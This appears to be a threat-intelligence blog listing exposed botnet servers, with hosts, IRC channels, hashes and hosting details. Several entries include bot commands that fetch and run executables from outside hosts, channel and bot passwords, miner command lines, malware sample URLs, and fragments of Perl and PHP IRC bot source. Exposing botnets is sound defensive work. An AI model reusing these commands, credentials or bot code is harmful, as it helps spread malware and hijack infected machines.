Resolved thebankslife.no-ip.biz to 72.20.28.232 Server: thebankslife.no-ip.biz Port: 6667 Channel Users Topic #sexlyfe 2 [+nt] #Syncrude 78 [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5 #bankslife 35 [+nt] .gtfo Channel: #Syncrude Now talking on #Syncrude Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5 Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013) Bitcoin mining info: macromedia.exe” -a scrypt -oRead more...
bitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5 Server: bitcoinglobalbanking.com Gate file: /b/order.php Alternate domain: bitcointradingdepot.com This botnet wasn’t actually mining bitcoins when I checked it. I’m very surprised. Hosting infos: http://whois.domaintools.com/82.192.92.5 Related md5s (search on malwr.com to download the samples): Beta bot bbfdbd53810751401b720641687a6116 EDIT: It finally started bitcoin mining Mining infos: macromedia.exe” -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.crRead more...
EpicBot v1.0 by h22turbo(hosted in United Kingdom Derby Webfusion Internet Solutions)
Perl bot found by Yewnix my @adms=(“Darkone”);my @canais=(“#dark7887”);my @nickname = (“DARK”);my $nick = $nickname[rand scalar @nickname];my $ircname =’dark’;chop (my $realname = `uname -a`);$servidor=’dark86.no-ip.org’ unless $servidor;my $porta=’7000′; Source EpicBot hosting infos: http://whois.domaintools.com/91.109.4.212
Autoit Bot
Found this sample and decompiled so have fun with the source wich is partially encrypted. Here the sample: hxxp://93.57.18.211/bot.exe And here the source decompiled and partially encrypted with BitXOR password for the link is : exposedbotnets
voscomptesenligne.eu(Andromeda Bot hosted in Netherlands International Widespread Services Limited)
Sample found by ALiSs urls’s: hxxp://voscomptesenligne.eu/joomla/image.php hxxp://www.curboc.com/joomla/image.php Plugins: hxxp://voscomptesenligne.eu/joomla/f.pack hxxp://voscomptesenligne.eu/joomla/s.pack hxxp://voscomptesenligne.eu/joomla/r.pack hxxp://www.curboc.com /joomla/f.pack hxxp://www.curboc.com /joomla/s.pack hxxp://www.curboc.com /joomla/r.pack hxxp://voscomptesenligne.eu/joomla/fg.php?id=1880376902 Love Poem dedicated to Brian Krebs here: hxxp://voscomptesenligne.eu/ Same Poem here : hxxp://www.curboc.com Samples: hxxp://91.223.82.147/andro.exe hxxp://www.curboc.com/andro.exe hxxp://www.curboc.com/miner.exe hxxp://voscomptesenligne.eu/miner.exe miner.exe downloads: hxxp://93.113.171.18/upl/pYofXDkAVERHbkeo/m.jpg (www.fisier.ro) hosting infos: http://whois.domaintools.com/91.223.82.179
178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)
Botnet found by rolls Server: 178.86.23.225:1875 Server Password: Username: uiswnri Nickname: n{DE|XPa}uiswnri Channel: #moon (Password: 4m3r1k) Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0 Inactive domain :harlan10.com hosting infos: http://whois.domaintools.com/178.86.23.225
smokelessbooter.tk (Betabot http botnet hosted by ecatel.net)
Resolved smokelessbooter.tk to 94.102.51.123 Server: smokelessbooter.tk Gate file: /bronk/order.php Alternate domains: watchonlinecams.comssh-products.comfudfiles.comtheprofitnet.com1337hackers.comcash-networks.com We have a real HF hecker here folks. I can see a Java “driveby” site, shitty crypter site, shitty CPA network site and a shitty hackforums clone site just from the domain names. Looks like he’s running a shitty hosting company as well:Read more...
bigtoys.pw (Betabot http botnet hosted by namecheap.com)
Resolved bigtoys.pw to 198.187.28.72 Server: bigtoys.pw Gate file: /b/order.php Alternative domain: smalltoys.pw I wonder who this could belong to? Name Server:NS2.HOSTING-MARVID.ME Name Server:NS1.HOSTING-MARVID.ME An idiot, obviously Related md5s (search on malwr.com to download the samples): Betabot: 2662af32e5d58d471bd16dc3202db284 Hosting infos: http://whois.domaintools.com/198.187.28.72
us.eclipsemc.com(BitCoin Miner hosted in United States Independence Host Metro)
Sample: hxxp://darknode.net/Mining.exe coin-miner.exe” -a sha256 -o hxxp://brucegregory_bot:x@us.eclipsemc.com:8337 -T 83 -l yes -t 1 hosting infos: http://whois.domaintools.com/67.14.164.114
37.221.170.195(PHP Bots hosted in Germany Frankfurt Am MainVoxility S.r.l.)
Found by Yewnix <? set_time_limit(0); error_reporting(0); class Anxiety { var $config = array("server"=>"37.221.170.195", // Server IP Address "port"=>443, "pass"=>"", // Server Password "prefix"=>"[r00t]-", "maxrand"=>3, "chan"=>"#exploit", // Channel "key"=>"lolmoney", // Channel Key "modes"=>"+p", "password"=>"lolmoney", // Bot Password "trigger"=>".", "hostauth"=>"anxiety.gov" // * For Any Hostname //Leave all of this shit down here alone, unless you know whatRead more...